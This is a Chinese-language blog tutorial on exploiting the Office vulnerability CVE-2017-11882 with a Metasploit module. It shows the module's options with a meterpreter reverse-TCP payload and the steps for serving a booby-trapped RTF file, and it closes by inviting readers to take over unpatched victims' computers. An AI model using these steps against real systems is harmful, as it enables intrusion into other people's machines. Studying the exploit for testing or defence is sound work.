版权声明:本文为Dark Pigeon原创文章,未经博主允许不得转载。 https://blog.csdn.net/m0_37217636/article/details/78945681
这个漏洞出来很久了,据说通杀以下版本的Office:
MicrosoftOffice 2000
MicrosoftOffice 2003
MicrosoftOffice 2007 Service Pack 3
MicrosoftOffice 2010 Service Pack 2
MicrosoftOffice 2013 Service Pack 1
MicrosoftOffice 2016
MicrosoftOffice 365
注意是没有更新过的Office。
屁话不多说了。因为我比较喜欢使用Metasploit框架,大家不喜欢的话可以到这个地址:https://github.com/Ridter/CVE-2017-11882.git下载工具。
首先,启动Metasploit并连接数据库(没有自动连接的请手动操作)。
然后加载这个模块,如图:
使用show options看看有什么要设置的。
msf exploit(windows/fileformat/office_ms17_11882) > show options
Module options (exploit/windows/fileformat/office_ms17_11882):
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME msf.rtf yes Filename to save as, or inject
FOLDER_PATH no Path to file to inject
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Microsoft Office
msf exploit(windows/fileformat/office_ms17_11882) >
其中,Required选项为Yes的必须要填。有一些设置是默认的。
然后开始设置,并启动服务。
接着,我们在物理机上访问一下这个地址。
注意,我们启用了SSL,因此Chrome会弹出不安全提示。
只需要点高级,继续访问即可。
如图,就会下载这个文件。
如果Office没有打补丁,你就会发现返回了一个meterpreter回话,但是不幸的是,Win10给我自动更新装上了这个补丁,于是我看到的是这样的。
这也就意味着渗透失败了。但是如果对方是一个将Windows自动更新关闭且没有在安全软件的监护下安装漏洞补丁的人,你就可以使用meterpreter愉快的在他的电脑里玩耍了。